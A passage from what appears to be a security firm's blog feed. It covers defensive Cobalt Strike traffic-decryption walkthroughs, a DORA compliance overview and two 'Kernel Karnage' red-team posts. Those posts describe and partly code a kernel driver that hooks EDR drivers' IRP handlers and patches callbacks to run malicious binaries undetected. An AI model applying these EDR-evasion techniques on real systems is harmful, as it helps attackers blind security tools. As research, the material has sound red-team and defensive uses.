Option -f dns is required to process DNS traffic, and option -i 8.8.4.4 is used to provide the DNS_Idle value. This value is needed to properly decode DNS replies (it is not needed for DNS queries).

The encrypted data (red rectangle) can then be used to find the AES and HMAC keys inside the process memory dump of the running beacon:

Figure 11: extracting cryptographic keys from process memory

These keys can then be used to decrypt the DNS traffic:

Figure 12: decrypting DNS traffic

This traffic was used in a CTF challenge of the Cyber Security Rumble 2021. To find the flag, grep for CSR in the decrypted traffic:

Figure 13: finding the flag inside the decrypted traffic

Conclusion

The major difference between DNS Cobalt Strike traffic and HTTP Cobalt Strike traffic is how the encrypted data is encoded. Once encrypted data is recovered, decrypting it is very similar for DNS and HTTP.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

The digital operational resilience act (DORA): what you need to know about it, the requirements and challenges we see.

23 November 2021 at 15:02

TL;DR – In this blogpost, we will give you an introduction to DORA, as well as how you can prepare yourself to be ready for it.

More specifically, throughout this blogpost we will try to formulate an answer to following questions:

  • What is DORA and what are the key requirements of DORA?
  • What are the biggest challenges that you might face in becoming “DORA compliant”?

This blog post is part of a series, so keep an eye out for the following parts! In the following blogposts, we will further explore the requirements of DORA, as well as elaborate a self-assessment checklist for financial entities to start assessing their compliance.

What is DORA?

DORA stands for Digital Operational Resilience Act. DORA is the EU proposal to tackle digital risks and build operational resilience in the financial sector. 

The idea of DORA is that organizations are able to demonstrate that they can resist, respond and recover from the impacts of ICT incidents, while continuing to deliver critical functions and minimizing disruption for customers and for the financial system as a whole.

With the DORA, the EU aims to make sure financial organisations mitigate the risks arising from increasing reliance on ICT systems and third parties for critical operations. The risks will be mitigated through appropriate Risk Management, Incident Management, Digital Operational Resilience Testing, as well as Third-Party Risk Management.

Who is concerned?

DORA applies to financial entities, from banks (i.e. credit institutions) to investment and payment institutions, electronic money institutions, pension funds, audit firms, credit rating agencies, insurance and reinsurance undertakings and intermediaries.

Beyond that it also applies to providers of digital and data services, including providers of cloud computing services, data analytics, & data centres.

Note that, while the scope of the DORA itself is proposed to encompass nearly the entire financial system, at the same time it allows for a proportionate application of requirements for financial entities that are micro enterprises.

Exploring DORA

What is operational resilience? Digital operational resilience is the ability to build, assure and review the technological operational integrity of an organisation. In a nutshell, operational resilience is a way of thinking and working that emphasizes the hardening of systems so that when an organization is attacked, it has the means to respond, recover, learn, and adapt.

Organizations that do not adopt this mindset are likely to experience DORA as an almost impossibly long checklist of disconnected requirements. We will cover the requirements in the coming blogposts.

DORA introduces requirements across five pillars: 

  • ICT Risk Management
  • ICT-related Incidents Management, Classification and Reporting
  • Digital Operational Resilience Testing
  • ICT Third-Party Risk Management
  • Information and Intelligence Sharing

For each of the 5 pillars, we have summarised the requirements and the key challenges to start addressing now.

ICT Risk Management

DORA requires organizations to apply a strong risk-based approach in their digital operational resilience efforts. This approach is reflected in Chapter 2 of the regulation.

What is required?

ICT risk management requirements form a set of key principles revolving around specific functions (identification, protection and prevention, detection, response and recovery, learning and evolving and communication). Most of them are recognized by current technical standards and industry best practices, such as the NIST framework, and thus the DORA does not impose specific standardization itself.

What do we consider as potential challenges for most organizations?

As described in DORA, the structure does not significantly deviate from standard Information security risk management as defined in NIST Cyber Security Framework.

However, we foresee some elements that might raise additional complexity:

First, as we reviewed, the ICT risk management requirements are organised around:

  • Identifying business functions and the information assets supporting these.
  • Protecting and preventing these assets.
  • Detecting anomalous activities.
  • Developing response and recovery strategies and plans, including communication to customers and stakeholders.

We foresee several elements that might raise additional complexity:

1. Nowadays, we see many organizations struggling with adequate asset management. A first complexity might emerge from the fact the ICT risk management framework shall include the identification of critical and important functions as well as the mapping of the ICT assets that underpin them. This framework shall also include the assessment of all risks associated with the ICT-related business functions and information assets identified.

2. Protection and Prevention is also a challenge for most organizations. Based on the risk assessment, financial entities shall set up protection and prevention measures to ensure the resilience, continuity and availability of ICT systems. These shall include ICT  security  strategies, policies,  procedures and appropriate technologies to ensure the continuous monitoring and control of ICT systems and tools.

3. Most organizations also struggle with timely or prompt detection of anomalous activities. Some complexity might arise as financial entities shall have to ensure the prompt detection of anomalous activities, enforce multiple layers of control, as well as enable the identification of single points of failure.

4. However, while the first three of these will be fairly familiar to most firms, although implemented with various degrees of maturity, the latter (response and recovery) should focus minds. This will require financial entities to think carefully about substitutability, including investing in backup and restoration systems, as well as assess whether – and how – certain critical functions can operate through alternative systems or methods of delivery while primary systems are checked and brought back up.

5. On top of this, as part of the “Learning and Evolving” part of DORA’s Risk Management Framework, DORA not only introduces compulsory training on digital operational resilience for the management body but also for the whole staff, as part of their general training package. Getting all staff on-board might create additional complexity.

In a coming blogpost, we will be reviewing the requirements associated with the risk-based approach based on the ICT risk management framework of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

ICT-related Incidents Management, Classification and Reporting

DORA has its core in a strong evaluation and reporting process. This process is reflected in Chapter 3 of the regulation.

What is required?

In the regulation, ICT-related incident reporting obliges financial entities to establish and implement a management process to monitor and log ICT-related incidents and to classify them based on specific criteria.

The ICT-related Incident Management requirements are organised around:

  • Implementation of an ICT-related incident management process
  • Classification of ICT-related incidents
  • Reporting of major ICT-related incidents

What do we consider as potential challenges for most organizations?

We foresee two elements that might raise additional complexity:

1. First, financial entities will need to review their incident classification methodology to fit with the requirements of the regulation. To help organisations prepare, we anticipate that the incident classification methodology will align with the ENISA Reference Incident Classification Taxonomy.  Indeed, this framework is referenced in the footnote of DORA. Other standards might be permissible, provided they meet the conditions set out in the Regulation but, when a standard or framework is especially called out, there is no downside to considering it.

2. Second, financial entities will also need to set up the right processes and channels to be able to notify the regulator fast in case a major incident occurs. Although firms will only need to report major incidents to their national regulator, this will need to be within strict deadlines. Moreover, based on what gets classified as “major”, this might happen frequently. 

In a coming blogpost, we will be reviewing the requirements associated with the ICT-related Incidents Management of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

Digital Operational Resilience Testing

DORA introduces testing of the efficiency of the risk management framework and of the measures in place to respond to and recover from a wide range of ICT incident scenarios. This process is reflected in Chapter 4 of the regulation.

What is required?

The underlying rationale behind this part of the regulation is that undetected vulnerabilities in financial entities could threaten the stability of the financial sector. In order to mitigate this risk, DORA introduces a comprehensive testing program that aims to identify and explore possible ways in which financial entities could be compromised.

Digital operational resilience testing serves to periodically test the ICT risk management framework for preparedness, to identify weaknesses, deficiencies or gaps, and to promptly adopt corrective measures.

DORA also strongly recommends advanced testing of ICT tools, systems and processes based on threat-led penetration testing (“TLPT”), carried out at least every 3 years. The technical standards to apply when conducting intelligence-based penetration testing are likely to be aligned with the TIBER-EU framework developed by the ECB.

The Digital Operational Resilience Testing requirements are therefore organised around:

  • Basic Testing of ICT tools and systems – Applicable to all financial entities
  • Advanced Testing of ICT tools, systems and processes (“TLPT”) – Only applicable to financial entities identified as significant by competent authorities

What do we consider as potential challenges for most organizations?

We foresee two elements that might raise additional complexity:

1. First, from a cultural standpoint, a challenge might be that financial entities perceive Operational Resilience testing as BCP or DR testing. A word of caution is needed here, as the objective of DORA with this requirement is focused more on penetration testing than on traditional Operational Resilience testing.

From another cultural standpoint, resilience testing programs should not be perceived as a single goal, nor as a binary concept (either in place or not). As stated, the underlying rationale behind DORA is rather about identifying weaknesses, deficiencies or gaps, and admitting that a breach might happen or a vulnerability could go undetected. DORA is therefore more about preparing to withstand just such a possibility.

2. Second, as stated, significant financial entities (which might be firms already in the scope of the NIS regulation) will have to implement a threat-led penetration testing program and exercise. It is likely that this first exercise will have to be organized by the end of 2024. This might seem like a sufficient period of time for these tests to be conducted; however, consider that these types of tests will require a lot of preparation. First, all EU-based critical ICT third parties are required to be involved. This means that all of these third parties should also be involved in the preparation of this exercise, which will require a lot of coordination and planning beforehand. Second, the scenario for these threat-led penetration testing exercises will have to be agreed by the regulator in advance. Significant financial entities should therefore start thinking about the scenario as soon as possible to enable validation with the regulator at least 2 years before the deadline.

In a coming blogpost, we will be reviewing the requirements associated with the Resilience Testing of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

ICT Third-Party Risk Management

DORA introduces the governance of third-party service providers and the management of third-party risks. DORA states that financial entities should have an appropriate level of control over, and monitoring of, their ICT third parties. This process is reflected in Chapter 5 of the regulation.

What is required?

Chapter 5 addresses the key principles for a sound management of ICT Third-Party risks. In a nutshell, the main requirements associated with these key principles could be described as the following:

  • Obligatory Contractual Provisions:
    • DORA introduces obligatory provisions that have to be present in any contract concluded between a financial institution and an ICT third-party provider.
  • ICT third-party risk strategy definition:
    • Firms shall define a multi-vendor ICT third-party risk strategy and policy owned by a member of the management body.
  • Maintenance of a Register of Information:
    • Firms shall define and maintain a register of information that contains the full view of all their ICT third-party providers, the services they provide and the functions they underpin according to the key contractual provisions.
  • Perform due diligence/assessments:
    • Firms shall assess ICT service providers according to certain criteria before entering into a contractual arrangement on the use of ICT services (e.g. security level, concentration risk, sub-outsourcing risks).

What do we consider as potential challenges for most organizations?

We foresee several elements that might raise additional complexity:

1. One of the main challenges that we foresee relates to the assembling and maintenance of the Register of Information. Financial entities will have to collect information on all ICT vendors (not only the most critical).

This might create additional complexity, as DORA states that this register shall be maintained at entity level and at sub-consolidated and consolidated levels. DORA also states that this register shall include all contractual arrangements on the use of ICT services provided, identifying the services the third party provides and the functions they underpin.

This requirement could be a challenge both for large financial entities that rely on thousands of big and small providers, and for smaller, less mature financial institutions that will have to ensure that the register of information is complete and accurate.

Some other challenges also have to be foreseen.

2. Contracts with all ICT providers will probably need to be amended. For “EBA” critical contracts this will be covered through the EBA directive on this. For others (if all ICT providers are affected), this will not be the case yet. Identifying those contracts and upgrading them will be a challenge.

3. Regarding the Exit strategy, and following the same reasoning, for “EBA” critical contracts this will be covered through the EBA directive on this. For others, this might not be the case yet. Determining how to enforce this requirement in these contracts will also create additional complexity.

4. Determining a correct risk-based approach for performing assessments on the ICT providers will possibly add complexity as well. Performing assessments on all ICT providers is not feasible. ICT providers will have to be prioritized based on criticality criteria that will have to be defined.

In a coming blogpost, we will be reviewing the requirements associated with the ICT Third-Party Risk Management of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

Information and Intelligence Sharing

DORA promotes information-sharing arrangements on cyber threat information and intelligence. This process is reflected in Chapter 6 of the regulation.

What is required?

DORA introduces guidelines on setting up information sharing arrangements between firms to exchange among themselves cyber threat information and intelligence on tactics, techniques, procedures, alerts and configuration tools in a trusted environment.

What do we consider as potential challenges for most organizations?

While many organisations already have such agreements in place, challenges might still emerge, such as:

  • How will you determine what information to share? There should be a balance between helping the community and ensuring alignment with laws and regulations, as well as not sharing sensitive information with competitors.
  • How will you share this information efficiently?
  • What processes will you set up to consume the information shared by other entities?

Preparing yourself

In order to be ready, we recommend organisations take the following steps in 2021 and 2022:

  • Conduct a maturity assessment against the DORA requirements and define a mitigation plan to reach compliance.
  • Start consolidating the register of information for all ICT third-party providers.
  • Start defining a potential scenario for the large-scale penetration test.

About the Author

Nicolas is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into his technical hands-on experiences as well as his managerial academic background to help organisations build out their Cyber Security Strategy. He has a strong interest in IT management, Digital Transformation, Information Security and Data Protection. In his personal life, he likes adventurous vacations. He hiked several 4000+ summits around the world, and secretly dreams about one day hiking all of the top summits. In his free time, he is an academic teacher who has been teaching for 7 years at both the Solvay Brussels School of Economics and Management and the Brussels School of Engineering.

Find out more about Nicolas on LinkedIn.

Kernel Karnage – Part 4 (Inter(ceptor)mezzo)

19 November 2021 at 15:18

To make up for the long wait between parts 2 and 3, we’re releasing another blog post this week. Part 4 is a bit smaller than the others, an intermezzo between parts 3 and 5 if you will, discussing interceptor.

1. RTFM & W(rite)TFM!

The past few weeks I spent a lot of time getting acquainted with the Windows kernel and the inner workings of certain EDR/AV products. I also covered the two main methods of attacking the EDR/AV drivers, namely kernel callback patching and IRP MajorFunction hooking. I’ve been working on my own driver called Interceptor, which will implement both these techniques as well as a method to load itself into kernel memory, bypassing Driver Signature Enforcement (DSE).

I’m of the opinion that when writing tools or exploits, the author should know exactly what each part of his/her/their code is responsible for, how it works and avoid copy pasting code from similar projects without fully understanding it. With that said, I’m writing Interceptor based on numerous other projects, so I’m taking my time to go through their associated blogposts and understand their working and purpose.

Interceptor currently supports IRP hooking/unhooking drivers by name or by index based on loaded modules.

Using the -l option, Interceptor will list all the currently loaded modules on the system and assign them an index. This index can be used to hook the module with the -h option.

Using the -lh option, Interceptor will list all the currently hooked modules with their corresponding index in the global hooked drivers array. Interceptor currently supports hooking up to 64 drivers. The index can be used with the -u option to unhook the module.

Interceptor list hooked drivers

Once a module is hooked, Interceptor’s InterceptGenericDispatch() function will be called whenever an IRP is received. The current function reports via a debug message that a call was intercepted and then calls the original completion routine. I’m currently working on a method to inspect and modify the IRPs before passing them to their completion routine.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    // DeviceObject is used below to look up the hooked driver, so it is not marked unreferenced
    auto stack = IoGetCurrentIrpStackLocation(Irp);
    auto status = STATUS_UNSUCCESSFUL;
    KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
        return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}

I’m also working on a module that supports patching kernel callbacks. The difficulty here is locating the different callback arrays by enumerating their calling functions and looking for certain opcode patterns, which change between different versions of Windows.

As mentioned in one of my previous blogposts, locating the callback arrays for PsSetCreateProcessNotifyRoutine() and PsSetCreateThreadNotifyRoutine() is done by looking for a CALL instruction to PspSetCreateProcessNotifyRoutine() and PspSetCreateThreadNotifyRoutine() respectively, followed by looking for a LEA instruction.

Finding the callback array for PsSetLoadImageNotifyRoutine() is slightly different as the function first jumps to PsSetLoadImageNotifyRoutineEx(). Next, we skip looking for the CALL instruction and go straight for the LEA instruction instead, which puts the callback array address into RCX.

LoadImage callback array
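
To illustrate the last step, here is a minimal Python sketch (not Interceptor's kernel code) of how a RIP-relative LEA into RCX can be resolved to an absolute address. It assumes the instruction is encoded as 48 8D 0D followed by a signed 32-bit displacement, which is the standard x64 encoding of LEA RCX, [RIP+disp32]. The function name and the sample addresses are hypothetical, and a naive byte search like this can match inside unrelated instructions, so real code would need to validate the hit.

```python
import struct

# Standard x64 encoding of LEA RCX, [RIP+disp32]: REX.W prefix, opcode 8D, ModRM 0D
LEA_RCX_RIP = b"\x48\x8d\x0d"
LEA_LENGTH = 7  # 3 opcode bytes + 4 displacement bytes


def resolve_lea_rcx(code: bytes, base_address: int, start: int = 0):
    """Return (offset, target) for the first LEA RCX,[RIP+disp32] at or after start.

    code is a copy of the function bytes, base_address the address of code[0].
    Returns None when no complete instruction is found.
    """
    offset = code.find(LEA_RCX_RIP, start)
    if offset == -1 or offset + LEA_LENGTH > len(code):
        return None
    # The displacement is a little-endian signed 32-bit integer
    (displacement,) = struct.unpack_from("<i", code, offset + 3)
    # RIP-relative addressing is relative to the address of the next instruction
    next_instruction = base_address + offset + LEA_LENGTH
    return offset, next_instruction + displacement
```

For example, with two NOP bytes followed by the LEA and a displacement of 0x1000 at a hypothetical base of 0x140000000, the function resolves the target to 0x140001009.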

Interceptor’s callback module currently implements patching functionality for Process and Thread callbacks.

The registered callbacks on the system and their patch status can be listed using the -lc command.

2. Conclusion

In the previous blogpost of this series, we combined the functionality of two drivers, Evilcli and Interceptor, to partially bypass $vendor2. In this post we took a closer look at Interceptor’s capabilities and future features that are in development. In the upcoming blogposts, we’ll see how Interceptor as a fully standalone driver is able to conquer not just $vendor2, but other EDR products as well.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Decrypting Obfuscated Traffic – Part 4

17 November 2021 at 08:42

Encrypted Cobalt Strike C2 traffic can be obfuscated with malleable C2 data transforms. We show how to deobfuscate such traffic.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. And in part 3, we explained how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump.

In the first 3 parts of this series, we have always looked at traffic that contains the unaltered, encrypted data: the data returned for a query and the data posted were just the encrypted data.

This encrypted data can be transformed into traffic that looks more benign, using malleable C2 data transforms. In the example we will look at in this blog post, the encrypted data is hidden inside JavaScript code.

But how do we know if a beacon is using such instructions to obfuscate traffic, or not? This can be seen in the analysis results of the latest version of tool 1768.py. Let’s take a look at the configuration of the beacon we started with in part 1:

Figure 1: beacon with default malleable C2 instructions

We see for field 0x000b (malleable C2 instructions) that there is just one instruction: Print. This is the default, and it means that the encrypted data is received as-is by the beacon: it does not need any transformation prior to decryption.

And for field 0x000d (http post header), we see that the Build Output is also just one instruction: Print. This is the default, and it means that the encrypted data is transmitted as-is by the beacon: it does not need any transformation after encryption.

Let’s take a look at a sample with custom malleable C2 data transforms:

Figure 2: beacon with custom malleable C2 instructions

Here we see more than just a Print instruction: “Remove 1522 bytes from end”, “Remove 84 bytes from begin”, …

These are instructions to transform (deobfuscate) the incoming traffic, so that it can then be decrypted. To understand in detail how this works, we will do the transformation manually with CyberChef. However, do know that tool cs-parse-http-traffic.py can do these transformations automatically.

This is the network capture for a single GET request by the beacon and reply from the team server (C2):

Figure 3: reply transformed with malleable C2 instructions to look like JavaScript code

What we see here, is a GET request by the beacon to the C2 (notice the Cookie with the encrypted metadata) and the reply by the C2. This reply looks like JavaScript code, because of the malleable C2 data transforms that have been used to make it look like JavaScript code.

We copy this reply over to CyberChef in its input field:

Figure 4: CyberChef with obfuscated input

The instructions we need to follow, to deobfuscate this reply, are listed in tool 1768.py’s output:

Figure 5: decoding instructions

So let’s get started. First we need to remove 1522 bytes from the end of the reply. This can be done with a CyberChef drop bytes function and a negative length (negative length means dropping from the end):

Figure 6: dropping 1522 bytes from the end

Then, we need to remove 84 bytes from the beginning of the reply:

Figure 7: dropping 84 bytes from the beginning

And then also dropping 3931 bytes from the beginning:

Figure 8: dropping 3931 bytes from the beginning

And now we end up with output that looks like BASE64 encoded data. Indeed, the next instruction is to apply a BASE64 decoding instruction (to be precise: BASE64 encoding for URLs):

Figure 9: decoding BASE64/URL data

The next instruction is to XOR the data. To do that we need the XOR key. The malleable C2 instruction to XOR uses a 4-byte long random key that is prepended to the XORed data. So to recover this key, we convert the binary output to hexadecimal:

Figure 10: hexadecimal representation of the transformed data

The first 4 bytes are the XOR key: b7 85 71 17

We use that with CyberChef’s XOR command:

Figure 11: XORed data

Notice that the first 4 bytes are NULL bytes now: that is as expected, XORing bytes with themselves gives NULL bytes.

And finally, we drop these 4 NULL bytes:

Figure 12: fully transformed data

What we end up with, is the encrypted data that contains the C2 commands to be executed by the beacon. This is the result of deobfuscating the data by following the malleable C2 data transform. Now we can proceed with the decryption using a process memory dump, just like we did in part 3.
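
The manual CyberChef steps above can also be sketched in a few lines of Python. This is only an illustration of the transform order described in this post (drop 1522 bytes from the end, drop 84 and then 3931 bytes from the beginning, BASE64 URL decode, XOR with the prepended 4-byte key). It is not the code of cs-parse-http-traffic.py, and the function names are hypothetical. Restoring stripped BASE64 padding is an assumption that makes the sketch work with or without padding.

```python
import base64


def base64url_decode(data: bytes) -> bytes:
    """Decode URL-safe BASE64, restoring padding in case it was stripped (assumption)."""
    padding = b"=" * (-len(data) % 4)
    return base64.urlsafe_b64decode(data + padding)


def xor_with_prepended_key(data: bytes) -> bytes:
    """Use the first 4 bytes as XOR key and return the decoded remainder."""
    key, body = data[:4], data[4:]
    return bytes(value ^ key[index % 4] for index, value in enumerate(body))


def deobfuscate_reply(reply: bytes) -> bytes:
    """Apply the transforms of this example profile, in the order listed by 1768.py."""
    data = reply[:-1522]           # remove 1522 bytes from end
    data = data[84:]               # remove 84 bytes from begin
    data = data[3931:]             # remove 3931 bytes from begin
    data = base64url_decode(data)  # BASE64 URL decoding
    return xor_with_prepended_key(data)  # XOR, then drop the 4 key bytes
```

XORing only the bytes after the key gives the same result as XORing everything and dropping the 4 resulting NULL bytes, because the key length and the number of dropped bytes are both 4.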

Figure 13: extracting the cryptographic keys from process memory

Tool cs-extract-key.py is used to extract the AES and HMAC key from process memory: it fails, it is not able to find the keys in process memory.

One possible explanation for why the keys cannot be found is that process memory is encoded. Cobalt Strike supports a feature for beacons, called a sleep mask. When this feature is enabled, the process memory with data of a beacon (including the keys) is XOR-encoded while a beacon sleeps. Thus only when a beacon is active (communicating or executing commands) will its data be in cleartext.

We can try to decode this process memory dump. Tool cs-analyze-processdump.py is a tool that tries to decode a process memory dump of a beacon that has an active sleep mask feature. Let’s run it on our process memory dump:

Figure 14: analyzing the process memory dump (screenshot 1)
Figure 15: analyzing the process memory dump (screenshot 2)

The tool has indeed found a 13-byte long XOR key, and written the decoded section to disk as a file with extension .bin.
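
As a rough illustration of what decoding with such a key means, here is a minimal repeating-key XOR sketch in Python. It is not the implementation of cs-analyze-processdump.py: the function name is hypothetical, and it assumes the key is already known and aligned with the first byte of the encoded section.

```python
def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a key that repeats every len(key) bytes (13 bytes in this example)."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(value ^ key[index % len(key)] for index, value in enumerate(data))
```

Because XOR is its own inverse, applying the same function with the same key to the decoded section would reproduce the encoded one.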

This file can now be used with cs-extract-key.py. It’s exactly the same command as before, but with the decoded section instead of the encoded .dmp file:

Figure 16: extracting keys from the decoded section

And now we have recovered the cryptographic keys.

Notice that in figure 16, the tool reports finding string sha256\x00, while in the first command (figure 13), this string is not found. The absence of this string is often a good indicator that the beacon uses a sleep mask, and that tool cs-analyze-processdump.py should be used prior to extracting the keys.

Now that we have the keys, we can decrypt the network traffic with tool cs-parse-http-traffic.py:

Figure 17: decrypting the traffic fails

This fails: the reason is the malleable C2 data transform. Tool cs-parse-http-traffic.py needs to know which instructions to apply to deobfuscate the traffic prior to decryption. Just like we did manually with CyberChef, tool cs-parse-http-traffic.py needs to do this automatically. This can be done with option -t.

Notice that the output of tool 1768.py contains a short-hand notation of the instructions to execute (between square brackets):

Figure 18: short-hand notations of malleable C2 instructions

For the tasks to be executed (input), it is:

7:Input,4,1:1522,2:84,2:3931,13,15

And for the results to be posted (output), it is:

7:Output,15,13,4
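
To make the short-hand notation easier to read, here is a small Python sketch that splits it into steps. The opcode meanings in ASSUMED_OPCODES are inferred from the walkthrough in this post (for example, 1:1522 matching “Remove 1522 bytes from end”), not taken from the tool's documentation, and the function names are hypothetical.

```python
# Meanings inferred from this post's walkthrough; treat them as assumptions
ASSUMED_OPCODES = {
    1: "remove bytes from end",
    2: "remove bytes from begin",
    4: "print",
    7: "direction marker",
    13: "BASE64 URL",
    15: "XOR with 4-byte key",
}


def parse_shorthand(notation: str):
    """Split a string like '7:Input,4,1:1522' into (opcode, argument) tuples."""
    steps = []
    for item in notation.split(","):
        opcode, _, argument = item.partition(":")
        steps.append((int(opcode), argument or None))
    return steps


def describe(steps):
    """Turn parsed steps into readable text using the assumed opcode meanings."""
    lines = []
    for opcode, argument in steps:
        name = ASSUMED_OPCODES.get(opcode, "unknown")
        lines.append(name if argument is None else f"{name} ({argument})")
    return lines
```

Parsing the input notation above yields the three removals followed by the BASE64 URL and XOR steps, in the same order as the manual CyberChef transformation.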

These instructions can be put together (using a semicolon as separator) and fed via option -t to tool cs-parse-http-traffic.py:

Figure 19: decrypted traffic

And now we finally obtain decrypted traffic. There are no actual commands here in this traffic, just “data jitter”: that is random data of random length, designed to obfuscate traffic even further.

Conclusion

We saw how malleable C2 data transforms are used to obfuscate network traffic, and how we can deobfuscate this network traffic by following the instructions.

We did this manually with CyberChef, but that is of course not practical (we did this to illustrate the concept). To obtain the decoded, encrypted commands, we can also use cs-parse-http-traffic.py. Just like we did in part 3, where we started with an unknown key, we do this here too. The only difference, is that we also need to provide the decoding instructions:

Figure 20: extracting and decoding the encrypted data

And then we can take one of these 3 pieces of encrypted data to recover the keys.

Thus the procedure is exactly the same as explained in part 3, except that option -t must be used to include the malleable C2 data transforms.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Kernel Karnage – Part 3 (Challenge Accepted)

16 November 2021 at 08:28

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

WinObj GLOBAL?? directory listing

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver to include callback functionality, which will also look at image load callbacks, which are used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

ESET registered callbacks

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good, although easy to detect, way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    PAUX_MODULE_EXTENDED_INFO modules;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
    if(!NT_SUCCESS(status))
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);
    //}

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;
}

Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \\Driver\\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys –> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.
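
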